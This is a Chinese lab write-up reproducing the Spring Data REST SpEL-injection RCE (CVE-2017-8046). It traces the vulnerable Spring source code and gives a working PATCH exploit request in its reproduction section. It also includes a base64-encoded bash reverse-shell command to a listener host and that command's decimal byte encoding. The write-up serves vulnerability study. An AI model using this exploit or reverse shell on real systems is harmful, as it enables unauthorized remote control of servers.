七天啊
七天啊

漏洞复现----41、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

文章目录

  • 一、Spring Data Rest简介
  • 二、漏洞分析
    • 2.1、代码分析
  • 三、漏洞复现

一、Spring Data Rest简介

Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

二、漏洞分析

对于JSON Patch请求方法IETF制定了标准RFC 6902。JSON Patch方法提交的数据必须包含一个path成员(path值中必须含有/),用于定位数据,同时还必须包含op成员,可选值如下:
add:添加数据
remove:删除数据
replace:修改数据
move:移动数据
copy:拷贝数据
test:测试给定数据与指定位置数据是否相等

根据RFC 6902,发送JSON文档结构需要注意以下两点:
1、请求头为Content-Type: application/json-patch+json
2、需要参数op、路径path,其中op所支持的方法很多,如test,add,replace等,path参数则必须使用斜杠分割。

2.1、代码分析

入口文件是位于org.springframework.data.rest.webmvc.config.JsonPatchHandler:apply()中:
通过request.isJsonPatchRequest确定是PATCH请求之后,调用applyPatch(request.getBody(), target);

public <T> T apply(IncomingRequest request, T target) throws Exception {
    Assert.notNull(request, "Request must not be null!");
    Assert.isTrue(request.isPatchRequest(), "Cannot handle non-PATCH request!");
    Assert.notNull(target, "Target must not be null!");
    if (request.isJsonPatchRequest()) {
        return applyPatch(request.getBody(), target);
    } else {
        return applyMergePatch(request.getBody(), target);
    }
}

其中isJsonPatchRequest的判断方法是:

public boolean isJsonPatchRequest() {
    // public static final MediaType JSON_PATCH_JSON = MediaType.valueOf("application/json-patch+json");
    return isPatchRequest() && RestMediaTypes.JSON_PATCH_JSON.isCompatibleWith(contentType);
}

跟踪进入到applyPatch()方法中:

<T> T applyPatch(InputStream source, T target) throws Exception {
    return getPatchOperations(source).apply(target, (Class<T>) target.getClass());
}

进入getPatchOperations()中:

private Patch getPatchOperations(InputStream source) {
    try {
        return new JsonPatchPatchConverter(mapper).convert(mapper.readTree(source));
    } catch (Exception o_O) {
        throw new HttpMessageNotReadableException(
                String.format("Could not read PATCH operations! Expected %s!", RestMediaTypes.JSON_PATCH_JSON), o_O);
    }
}

利用mapper初始化JsonPatchPatchConverter()对象之后调用convert()方法。
跟踪org.springframework.data.rest.webmvc.json.patch.JsonPatchPatchConverter:convert()方法:

public Patch convert(JsonNode jsonNode) {
        if (!(jsonNode instanceof ArrayNode)) {
            throw new IllegalArgumentException("JsonNode must be an instance of ArrayNode");
        } else {
            ArrayNode opNodes = (ArrayNode)jsonNode;
            List<PatchOperation> ops = new ArrayList(opNodes.size());
            Iterator elements = opNodes.elements();

            while(elements.hasNext()) {
                JsonNode opNode = (JsonNode)elements.next();
                String opType = opNode.get("op").textValue();
                String path = opNode.get("path").textValue();
                JsonNode valueNode = opNode.get("value");
                Object value = this.valueFromJsonNode(path, valueNode);
                String from = opNode.has("from") ? opNode.get("from").textValue() : null;
                if (opType.equals("test")) {
                    ops.add(new TestOperation(path, value));
                } else if (opType.equals("replace")) {
                    ops.add(new ReplaceOperation(path, value));
                } else if (opType.equals("remove")) {
                    ops.add(new RemoveOperation(path));
                } else if (opType.equals("add")) {
                    ops.add(new AddOperation(path, value));
                } else if (opType.equals("copy")) {
                    ops.add(new CopyOperation(path, from));
                } else {
                    if (!opType.equals("move")) {
                        throw new PatchException("Unrecognized operation type: " + opType);
                    }

                    ops.add(new MoveOperation(path, from));
                }
            }

            return new Patch(ops);
        }
    }

convert()方法返回Patch()对象,其中的ops包含了我们的payload。
进入到org.springframework.data.rest.webmvc.json.patch.Patch中:

public Patch(List<PatchOperation> operations) {
    this.operations = operations;
}

通过上一步地分析,ops是一个List对象,每一个PatchOperation对象中包含了op、path、value三个内容。
进入到PatchOperation分析其赋值情况:

public PatchOperation(String op, String path, Object value) {

    this.op = op;
    this.path = path;
    this.value = value;
    this.spelExpression = pathToExpression(path);
}

进入到pathToExpression()中:

public static Expression pathToExpression(String path) {
    return SPEL_EXPRESSION_PARSER.parseExpression(pathToSpEL(path));
}

这是一个SPEL表达式解析操作,但是在解析之前调用了pathToSpEL()
进入pathToSpEL()中:

private static String pathToSpEL(String path) {
    return pathNodesToSpEL(path.split("\\/"));          // 使用/分割路径
}

private static String pathNodesToSpEL(String[] pathNodes) {
    StringBuilder spelBuilder = new StringBuilder();
    for (int i = 0; i < pathNodes.length; i++) {
        String pathNode = pathNodes[i];
        if (pathNode.length() == 0) {
            continue;
        }
        if (APPEND_CHARACTERS.contains(pathNode)) {
            if (spelBuilder.length() > 0) {
                spelBuilder.append(".");            // 使用.重新组合路径
            }
            spelBuilder.append("$[true]");
            continue;
        }
        try {
            int index = Integer.parseInt(pathNode);
            spelBuilder.append('[').append(index).append(']');
        } catch (NumberFormatException e) {
            if (spelBuilder.length() > 0) {
                spelBuilder.append('.');
            }
            spelBuilder.append(pathNode);
        }
    }
    String spel = spelBuilder.toString();
    if (spel.length() == 0) {
        spel = "#this";
    }
    return spel;
}

重新回到org.springframework.data.rest.webmvc.config.JsonPatchHandler:applyPatch()中:

<T> T applyPatch(InputStream source, T target) throws Exception {
    return getPatchOperations(source).apply(target, (Class<T>) target.getClass());
}

执行getPatchOperations(source)得到的是一个Patch对象的实例,之后执行apply()方法。进入org.springframework.data.rest.webmvc.json.patch.Patch:apply()

public <T> T apply(T in, Class<T> type) throws PatchException {
    for (PatchOperation operation : operations) {
        operation.perform(in, type);
    }
    return in;
}

PatchOperation是一个抽象类,实际上应该调用其实现类的perform()方法。此时的operation实际是ReplaceOperation类的实例(这也和我们传入的replace操作是对应的)。
进入到ReplaceOperation:perform()中:

<T> void perform(Object target, Class<T> type) {
    setValueOnTarget(target, evaluateValueFromTarget(target, type));
}

protected void setValueOnTarget(Object target, Object value) {
    spelExpression.setValue(target, value);
}

setValueOnTarget()中会调用spelExpression对SpEL表达式进行解析,触发漏洞。

代码分析学习于:https://blog.spoock.com/2018/05/22/cve-2017-8046/

三、漏洞复现

访问IP:port/customers/1
漏洞复现----41、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)_第1张图片

抓包,修改请求如下:请求方法为PATCH;Content-Type: application/json-patch+jsonnew byte[]{command}:command为我们要执行的命令的十进制数。

PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{command}))/lastname", "value": "vulhub" }]

反弹shell代码:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMTEuNTUuMy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}
漏洞复现----41、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)_第2张图片

转换为十进制:98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,77,67,52,121,77,84,69,117,78,84,85,117,77,121,56,50,78,106,89,50,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

漏洞复现----41、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)_第3张图片

监听端执行监听
漏洞复现----41、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)_第4张图片

参考链接:
https://blog.spoock.com/2018/05/22/cve-2017-8046/
https://vulhub.org/#/environments/spring/CVE-2017-8046/

你可能感兴趣的:(网络安全技术,#,漏洞复现,CVE-2017-8046,远程命令执行)

  • HIS客户端无法登录系统,提示TNS-12518错误 wenzhongyan ORACLE-问题处理TNS-12518HeapsizexxxxKexcee
    基本要素接渠道反映,有个用户的部分客户端无法登录HIS系统,渠道无法排查问题原因,希望能远程协助排查问题分析步骤一:查看alert日志alert日志中出现HeapsizexxxxKexceedsnotificationthreshold(2048K)是10.2.0.1的一个典型问题,metalink上有如下解释:NOTE:Thedefaultthresholdin10.2.0.1is2M.Soth
  • mac GitHub客户端commit不了,应该怎么办? 大神风格化X
    今天我想将之前封装在GitHub上的项目重构一下,突然发现Git提示有冲突,然后我就想解决这个冲突,打开了终端通过命令得知之前的.ssh密钥失效(或者丢失)了,然后我就在我GitHub上将本地.git的第二个文件(我不太记得名字了)中的密钥复制到GitHub官网上,然后终端连接,发现又一个问题:提示远程端链接错误,然后我打开了本地GitHub库中对应项目的.git文件,上面的URL竟然没有,卧槽,
  • 自媒体新手怎么入门(新手做自媒体怎么开始) 配音就业圈
    针对于自媒体如何从0到1?今天就给大家总结最简单的三个方法!兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。第一点:就是从真实地记录自己开始,就是把生活当中点滴有价值的东西分享出来,什么叫做价值?如果你认为这件事情有意义,你就应该
  • 缓存与数据库的数据一致性解决方案分析 Do&Feel Java缓存数据库java
    在现代应用中,缓存技术的使用广泛且至关重要,主要是为了提高数据访问速度和优化系统整体性能。缓存通过在内存或更快速的存储系统中存储经常访问的数据副本,使得数据检索变得迅速,从而避免了每次请求都需要从较慢的主存储(如硬盘或远程数据库)中读取数据的延迟。这种技术特别适用于读取操作远多于写入操作的场景,如网页浏览、内容分发网络(CDN)和大规模的信息检索系统等。缓存的实现方式多样,包括但不限于内存缓存、分
  • 在Ubuntu 18.04上如何从默认的APT仓库安装MongoDB 白如意i linuxubuntumongodblinux
    前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。介绍MongoDB,也被称为Mongo,是一种常用于现代Web应用程序的免费开源NoSQL文档数据库。在本教程中,您将安装MongoDB,管理其服务,并可选择启用远程访问。先决条件要按照本教程操作,您需要:一个Ubuntu18.04服务器,按照此初始服务器设置教程进行设置,包括一个sudo非根用户和防
  • 抖音养号5个全攻略(抖音养号前期注意事项) 声优配音圈
    抖音入门篇1、新注册的号为何不能马上发作品,需要先养号?兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。在正式开始发布内容前,最好先养号3-5天,主要的目的就是为了增加账号的初始权重。养号就是模拟真人行为,点赞、关注、评论、分享、
  • MindSearch 快速部署(InternStudio 版) qq_31064397 人工智能python深度学习
    选择InternStudio算力平台50%A100的cuda12.2的开发机,并使用sshvscode远程连接到开发机。MindSearch(欢迎Star):https://github.com/InternLM/MindSearch1.使用免费的搜索接口1.1激活环境小助手提前帮大家安装好了环境,只需要一步一步按照下面的步骤便可以启动MindSearch。condaactivate/share/
  • 强大的Monibuca RTMP插件:实时流媒体处理的新星 颜殉瑶Nydia
    强大的MonibucaRTMP插件:实时流媒体处理的新星在现代数字时代,实时流媒体已经成为各种在线活动的核心部分,从在线会议、直播游戏到远程教育等不胜枚举。Monibuca是一个轻量级、高效的开源实时通信系统,而它的RTMP插件更是为实时流媒体传输添加了强大的翅膀。本文将深入探讨这个项目的背景、技术特性以及其应用场景,以期吸引更多开发者和使用者。MonibucaRTMP插件是什么?Monibuca
  • 2024,十大副业排行,要多卷有多卷,要多赚有多赚 配音就业圈
    年初许下的“搞钱”愿望,你今年实现了吗?2024年,越来越多的人把“搞钱”作为目标。换个印着“搞钱要紧”的手机壳或壁纸、时不时查看自己的财运、买各种理财书籍……当然,最重要的是充满干劲地工作。兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日
  • 什么是应届生?应届生的身份有多重要? 声优配音圈
    什么是应届生?它有两种定义,不仅指专科大三或者本科大四的学生。兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。应届生身份可以帮助落户,具有考试资格优势、找工作优势和心理优势等,一定要好好利用它。应届毕业生分为以下两种:1.即将毕业
  • 基于STM32开发的智能语音控制系统 stm32发烧友 stm32嵌入式硬件单片机
    目录引言环境准备工作硬件准备软件安装与配置系统设计系统架构硬件连接代码实现系统初始化语音识别与指令处理控制设备OLED显示与状态提示Wi-Fi通信与远程监控应用场景家庭环境中的智能语音控制办公环境中的语音交互常见问题及解决方案常见问题解决方案结论1.引言随着智能家居的发展,语音控制成为了人机交互的重要方式。本文将介绍如何使用STM32微控制器开发一个智能语音控制系统,通过语音识别模块、OLED显示
  • git 的基础命令,自动化打tag脚本 帅大黑 gitgithubbash
    官网地址https://git-scm.com/docsgit常用命令gitinit初始化仓库gitadd添加缓存区gitcommit提交更改gitfetch拉去远端不合并gitpull拉去远端合并gitpush推送代码gitmerge合并代码gittag新建taggitreset修改HEAD的位置getrevert撤销还原提交gitremote在远程库操作gitclean清楚未跟踪的文件gitc
  • 利用批处理脚本快速关闭Windows IPv6防御CVE-2024-38063漏洞攻击 半点闲 Windows技术windowsCVE-2024-38063IPv6
    利用批处理脚本快速关闭WindowsIPv6防御CVE-2024-38063漏洞攻击一、WindowsTCP/IP远程代码执行漏洞CVE-2024-38063二、简易批处理脚本关闭Windows系统中的IPv6三、安全建议作者:高玉涵时间:2024.8.1614:25博客:blog.csdn.net/cg_i环境:Windows7、Windows10、Windows11一、WindowsTCP/I
  • 银河麒麟高级服务器操作系统V10——安装VNC实现远程桌面 半点闲 OS/Networklinuxvnctightvnc
    银河麒麟高级服务器操作系统V10——安装VNC实现远程桌面检查桌面环境安装配置启动服务防火墙配置作者:高玉涵时间:2021.09.1410:14博客:blog.csdn.net/cg_i环境:Linuxintkf24.19.90-23.8.v2101.ky10.x86_64#1SMPMonMay1717:08:34CST2021x86_64x86_64x86_64GNU/Linux检查桌面环境生产
  • 没技术没经验怎么找工作 配音新手圈
    即使没有技术背景,您仍然有很多机会找到工作。以下是一些您可以考虑的方法:兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。1.注重您的优势和兴趣:尽量找到与您的个人优势和兴趣相匹配的工作。您可能在沟通技巧、团队合作、领导能力或创造力
  • Xtrabackup备份与恢复+异机远程流式备份 运维小弟| srebro.cn mysql数据库mysql运维
    一、Xtrabackup介绍MySQL冷备、mysqldump、MySQL热拷贝都无法实现对数据库进行增量备份。在实际生产环境中增量备份是非常实用的,如果数据大于50G或100G,存储空间足够的情况下,可以每天进行完整备份,如果每天产生的数据量较大,需要定制数据备份策略。例如每周实用完整备份,周一到周六实用增量备份。而Percona-Xtrabackup就是为了实现增量备份而出现的一款主流备份工具
  • 【Git】常用命令大全(带注释) 丶2136 版本控制git
    目录1.配置设置用户名和邮箱查看配置2.创建和初始化仓库创建新的Git仓库克隆现有仓库3.分支管理查看本地分支创建新分支切换分支创建并切换到新分支合并分支删除分支4.提交更改查看文件状态添加文件到暂存区提交更改提交并跳过暂存区5.查看提交历史查看提交日志查看提交历史的图形表示6.远程仓库交互添加远程仓库查看远程仓库拉取远程更改推送本地更改删除远程分支7.冲突解决查看冲突文件标记冲突文件为已解决提交
  • 在家轻轻松松就能赚钱?18个投稿平台,让你成为发布大咖! 声优配音圈
    描述:你是不是一直梦想着拥有自己的头条号,成为资讯发布的大咖?现在,我将为你揭晓18个热门投稿平台,让你实现这个梦想!无论你是新手还是老手,在这些平台上都能找到属于自己的发声机会。赶快来看看吧,扬起你的文字之翼,书写精彩的资讯吧!✍️兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译
  • HIVE 数据模型 HFDYCYY 大数据
    体系结构:元数据/HQL的执行安装:嵌入/远程/本地管理:CLI/web界面/远程服务数据类型:基本/复杂/时间数据模型:数据存储/内部表/分区表/外部表/桶表/视图WEB管理工具:http://tdxy-bigdata-04:8889/notebook/editor?type=hive集群状态管理:http://tdxy-bigdata-03:7180/cmf/home基于HDFS没有专门的数据
  • SMB文件共享服务器 小Z资本 网安学习服务器运维
    SMB:servermessageblock应用层网络协议在网络上跨平台共享文件和打印服务smb2.1租约概念3.0端到端加密TCP445端口SMB文件共享服务器:⼀种使⽤服务器消息块协议(SMB)来提供⽹络上的⽂件共享服务的服务器创建文件共享:在本地登录时,只受NTFS权限影响远程登录时,将受共享及NTFS权限的共同影响,且取交集⽀持多⽤户同时登录的操作系统(如WindowsServer系列),
  • 找工作哪些平台比较好 配音就业圈
    就业一直以来都是困扰人们的难题,尤其是疫情三年之后,很多公司破产,无数人失业,奔波于各个平台找工作成为越来越多人的日常,那么找工作哪些平台比较靠谱呢?兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。一、本科及以上学历,推荐猎聘网、
  • 2022羊城杯pwn wp Loτυs wppwn
    YCBSQL远程是上传一个sql文件,题目提示用nc带出flag。优先考虑sqlite自带的.system函数(抱着试一试的想法),然后找web手要了个vps监听,莫名其妙就出了。sql文件内容:.systemnc1.117.171.2489997b->c->dunlink之后成为a->c->db->c->d不过此时b->c->d的nodenum为1,因此不好操作,唯一好利用的点就是通过delet
  • 查看服务器sftp用户信息,linux查看sftp服务器配置 曾喜胜 Anson 查看服务器sftp用户信息
    linux查看sftp服务器配置内容精选换一换为加强对系统数据的容灾管理,云堡垒机支持配置日志备份,提高审计数据安全性和系统可扩展性。本小节主要介绍如何在系统配置FTP/SFTP服务器参数,将日志远程备份至FTP/SFTP服务器。开启远程备份后,系统默认在每天零点备份前一天的系统数据。以天为单位自动备份,生成日志文件,并上传到FTP/SFTP服务器相应路径。服务器同一路径下,不能重复云堡垒机配置了
  • kkFileView-4.3.0命令执行复现(QVD-2024-14703) 一个无名之辈的杂记本 漏洞复现网络安全
    搭建环境准备好如下材料:说明:LibreOffice_7_rpm.tar.gz是LibreOffice_7.5.3.2_Linux_x86-64_rpm.tar.gz重命名得到的。将LibreOffice_7_rpm.tar.gz放到/tmp/下,然后到kkFileView-4.3.0.tar.gz所在目录下执行如下命令:tar-zxvfkkFileView-4.3.0.tar.gzcdkkFil
  • Ubuntu 24.04部署Wordpress idiot_qi 其他工具ubuntulinuxwordpress
    环境:Ubuntu24.04PHP8.1.2-1ubuntu2.18Nginx/1.18.0(Ubuntu)WordPress6.6.1Mysql8文章目录1.安装php2.配置nginx2.1.安装nginx2.2.配置3.下载wordpress3.1.配置wordpress4.mysql配置wordpress数据库和用户4.1.安装和远程连接4.2.创建wordpress数据库和用户5.访问w
  • git克隆远程项目到本地并修改提交到gitee仓库 澜雲 笔记gitgiteegithub
    第一步创建一个新文件夹(自行命名)第二步在gitee仓库下载文件到创建的文件夹中第三步选择文件夹,右击选择gitbashhere第四步进行命令行管理//克隆仓库项目gitclone仓库地址//如gitclonehttps://gitee.com/hyxiaotouming/daily-practice-.git//如果文件不再当前目录下,则需要切换到文件坐在目录ls//查看子目录cd文件名//切换
  • stm32的OTA(IAP)设计 So_shine STM32MCU总结分享stm32嵌入式硬件单片机
    目录前言一、概念二、分区规划1、分区功能介绍2、分区规划在代码上的配置三、功能设计1、升级过程时序图2、升级协议3、boot代码设计4、app应用代码设计5、上位机程序代码设计四、固件出厂部署前言随着物联网的普及和设备互联需求的要求,产品具备本地/远程连接的能力成为一个关键的需求;当设备具备更强的网络连接能力时,开发/产品/用户产生对设备更广泛控制的能力的需求,而且需求也在不断变化当中;同时产品上
  • 服务器远程管理 小Z资本 网安学习服务器安全运维
    RDP:远程桌面协议(TCP端口3389)图形化界面管理(适合windows),端到端加密,有“bluekeep”漏洞,允许未经授权的远程代码执行SSH:安全壳(TCP端口22)加密通信,密钥认证,(公钥加密/非对称加密算法)补充:考虑保密性:公钥加密,私钥解密(数字签名技术)考虑不可否认性:公钥解密,私钥加密保密性:身份认证,访问控制(未经授权不得访问);加密(可以访问到但看不懂)支持端口转发,
  • 文件上传详解 星|焰 安全
    文件上传概念文件上传是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。文件上传原理文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。webshell一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境。webshel
  • 配音文案素材哭腔,女生配音台词文本 声优配音圈
    一、哭腔配音常规技巧在进行哭腔配音时,一些常规技巧是非常重要的。首先,要注意声音的温度和准确度。兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。哭腔配音需要表达情感,声音应该具有一定的温度和感染力,但也不能过于夸张,要掌握好度。此
  • Maven Array_06 eclipsejdkmaven
    Maven Maven是基于项目对象模型(POM), 信息来管理项目的构建,报告和文档的软件项目管理工具。 Maven 除了以程序构建能力为特色之外,还提供高级项目管理工具。由于 Maven 的缺省构建规则有较高的可重用性,所以常常用两三行 Maven 构建脚本就可以构建简单的项目。由于 Maven 的面向项目的方法,许多 Apache Jakarta 项目发文时使用 Maven,而且公司
  • ibatis的queyrForList和queryForMap区别 bijian1013 javaibatis
    一.说明         iBatis的返回值参数类型也有种:resultMap与resultClass,这两种类型的选择可以用两句话说明之:         1.当结果集列名和类的属性名完全相对应的时候,则可直接用resultClass直接指定查询结果类
  • LeetCode[位运算] - #191 计算汉明权重 Cwind java位运算LeetCodeAlgorithm题解
    原题链接:#191 Number of 1 Bits 要求: 写一个函数,以一个无符号整数为参数,返回其汉明权重。例如,‘11’的二进制表示为'00000000000000000000000000001011', 故函数应当返回3。 汉明权重:指一个字符串中非零字符的个数;对于二进制串,即其中‘1’的个数。 难度:简单 分析: 将十进制参数转换为二进制,然后计算其中1的个数即可。 “
  • 浅谈java类与对象 15700786134 java
          java是一门面向对象的编程语言,类与对象是其最基本的概念。所谓对象,就是一个个具体的物体,一个人,一台电脑,都是对象。而类,就是对象的一种抽象,是多个对象具有的共性的一种集合,其中包含了属性与方法,就是属于该类的对象所具有的共性。当一个类创建了对象,这个对象就拥有了该类全部的属性,方法。相比于结构化的编程思路,面向对象更适用于人的思维
  • linux下双网卡同一个IP 被触发 linux
    转自: http://q2482696735.blog.163.com/blog/static/250606077201569029441/ 由于需要一台机器有两个网卡,开始时设置在同一个网段的IP,发现数据总是从一个网卡发出,而另一个网卡上没有数据流动。网上找了下,发现相同的问题不少: 一、 关于双网卡设置同一网段IP然后连接交换机的时候出现的奇怪现象。当时没有怎么思考、以为是生成树
  • 安卓按主页键隐藏程序之后无法再次打开 肆无忌惮_ 安卓
    遇到一个奇怪的问题,当SplashActivity跳转到MainActivity之后,按主页键,再去打开程序,程序没法再打开(闪一下),结束任务再开也是这样,只能卸载了再重装。而且每次在Log里都打印了这句话"进入主程序"。后来发现是必须跳转之后再finish掉SplashActivity   本来代码:   // 销毁这个Activity fin
  • 通过cookie保存并读取用户登录信息实例 知了ing JavaScripthtml
    通过cookie的getCookies()方法可获取所有cookie对象的集合;通过getName()方法可以获取指定的名称的cookie;通过getValue()方法获取到cookie对象的值。另外,将一个cookie对象发送到客户端,使用response对象的addCookie()方法。 下面通过cookie保存并读取用户登录信息的例子加深一下理解。 (1)创建index.jsp文件。在改
  • JAVA 对象池 矮蛋蛋 javaObjectPool
    原文地址: http://www.blogjava.net/baoyaer/articles/218460.html Jakarta对象池       ☆为什么使用对象池   恰当地使用对象池化技术,可以有效地减少对象生成和初始化时的消耗,提高系统的运行效率。Jakarta Commons Pool组件提供了一整套用于实现对象池化
  • ArrayList根据条件+for循环批量删除的方法 alleni123 java
    场景如下: ArrayList<Obj> list Obj-> createTime, sid. 现在要根据obj的createTime来进行定期清理。(释放内存) ------------------------- 首先想到的方法就是 for(Obj o:list){ if(o.createTime-currentT>xxx){
  • 阿里巴巴“耕地宝”大战各种宝 百合不是茶 平台战略
    “耕地保”平台是阿里巴巴和安徽农民共同推出的一个 “首个互联网定制私人农场”,“耕地宝”由阿里巴巴投入一亿 ,主要是用来进行农业方面,将农民手中的散地集中起来 不仅加大农民集体在土地上面的话语权,还增加了土地的流通与 利用率,提高了土地的产量,有利于大规模的产业化的高科技农业的 发展,阿里在农业上的探索将会引起新一轮的产业调整,但是集体化之后农民的个体的话语权 将更少,国家应出台相应的法律法规保护
  • Spring注入有继承关系的类(1) bijian1013 javaspring
    一个类一个类的注入 1.AClass类 package com.bijian.spring.test2; public class AClass { String a; String b; public String getA() { return a; } public void setA(Strin
  • 30岁转型期你能否成为成功人士 bijian1013 成功
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • [Velocity三]基于Servlet+Velocity的web应用 bit1129 velocity
    什么是VelocityViewServlet 使用org.apache.velocity.tools.view.VelocityViewServlet可以将Velocity集成到基于Servlet的web应用中,以Servlet+Velocity的方式实现web应用   Servlet + Velocity的一般步骤 1.自定义Servlet,实现VelocityViewServl
  • 【Kafka十二】关于Kafka是一个Commit Log Service bit1129 service
    Kafka is a distributed, partitioned, replicated commit log service.这里的commit log如何理解?   A message is considered "committed" when all in sync replicas for that partition have applied i
  • NGINX + LUA实现复杂的控制 ronin47 lua nginx 控制
    安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。 这里说下freebsd的安装: fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
  • java-14.输入一个已经按升序排序过的数组和一个数字, 在数组中查找两个数,使得它们的和正好是输入的那个数字 bylijinnan java
    public class TwoElementEqualSum { /** * 第 14 题: 题目:输入一个已经按升序排序过的数组和一个数字, 在数组中查找两个数,使得它们的和正好是输入的那个数字。 要求时间复杂度是 O(n) 。如果有多对数字的和等于输入的数字,输出任意一对即可。 例如输入数组 1 、 2 、 4 、 7 、 11 、 15 和数字 15 。由于
  • Netty源码学习-HttpChunkAggregator-HttpRequestEncoder-HttpResponseDecoder bylijinnan javanetty
    今天看Netty如何实现一个Http Server org.jboss.netty.example.http.file.HttpStaticFileServerPipelineFactory: pipeline.addLast("decoder", new HttpRequestDecoder()); pipeline.addLast(&quo
  • java敏感词过虑-基于多叉树原理 cngolon 违禁词过虑替换违禁词敏感词过虑多叉树
    基于多叉树的敏感词、关键词过滤的工具包,用于java中的敏感词过滤 1、工具包自带敏感词词库,第一次调用时读入词库,故第一次调用时间可能较长,在类加载后普通pc机上html过滤5000字在80毫秒左右,纯文本35毫秒左右。   2、如需自定义词库,将jar包考入WEB-INF工程的lib目录,在WEB-INF/classes目录下建一个 utf-8的words.dict文本文件,
  • 多线程知识 cuishikuan 多线程
    T1,T2,T3三个线程工作顺序,按照T1,T2,T3依次进行 public class T1 implements Runnable{           @Override      
  • spring整合activemq dalan_123 java spring jms
    整合spring和activemq需要搞清楚如下的东东1、ConnectionFactory分:     a、spring管理连接到activemq服务器的管理ConnectionFactory也即是所谓产生到jms服务器的链接      b、真正产生到JMS服务器链接的ConnectionFactory还得
  • MySQL时间字段究竟使用INT还是DateTime? dcj3sjt126com mysql
      环境:Windows XPPHP Version 5.2.9MySQL Server 5.1 第一步、创建一个表date_test(非定长、int时间) CREATE TABLE `test`.`date_test` (`id` INT NOT NULL AUTO_INCREMENT ,`start_time` INT NOT NULL ,`some_content`
  • Parcel: unable to marshal value dcj3sjt126com marshal
    在两个activity直接传递List<xxInfo>时,出现Parcel: unable to marshal value异常。   在MainActivity页面(MainActivity页面向NextActivity页面传递一个List<xxInfo>):   Intent intent = new Intent(this, Next
  • linux进程的查看上(ps) eksliang linux pslinux ps -llinux ps aux
    ps:将某个时间点的进程运行情况选取下来 转载请出自出处:http://eksliang.iteye.com/admin/blogs/2119469 http://eksliang.iteye.com         ps 这个命令的man page 不是很好查阅,因为很多不同的Unix都使用这儿ps来查阅进程的状态,为了要符合不同版本的需求,所以这个
  • 为什么第三方应用能早于System的app启动 gqdy365 System
    Android应用的启动顺序网上有一大堆资料可以查阅了,这里就不细述了,这里不阐述ROM启动还有bootloader,软件启动的大致流程应该是启动kernel -> 运行servicemanager 把一些native的服务用命令启动起来(包括wifi, power, rild, surfaceflinger, mediaserver等等)-> 启动Dalivk中的第一个进程Zygot
  • App Framework发送JSONP请求(3) hw1287789687 jsonp跨域请求发送jsonpajax请求越狱请求
    App Framework 中如何发送JSONP请求呢? 使用jsonp,详情请参考:http://json-p.org/ 如何发送Ajax请求呢? (1)登录 /*** * 会员登录 * @param username * @param password */ var user_login=function(username,password){ // aler
